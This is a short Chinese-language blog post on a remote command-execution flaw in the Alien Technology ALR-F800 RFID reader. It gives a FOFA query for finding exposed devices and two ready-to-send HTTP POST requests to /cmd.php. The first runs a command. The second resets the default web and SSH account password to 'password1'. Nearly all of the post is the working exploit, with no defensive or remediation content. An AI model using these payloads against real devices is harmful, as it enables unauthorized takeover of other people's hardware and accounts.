Babing
Published on 2024-08-30 / 1 Visits
0
0

A42-2Alien-ALR-F800-RCE

A42-2Alien-ALR-F800-RCE

漏洞描述:

Alien Technology ALR-F800存在命令执行漏洞

fofa语法:

“ALR-F800”

漏洞复现:

payload:

POST /cmd.php HTTP/1.1
Host: 
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

cmd=help

Web 界面和 SSH 的默认帐户(用户名)的密码将重置为password1
payload:

POST /cmd.php HTTP/1.1
Host: 
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

cmd=password=password1

Comment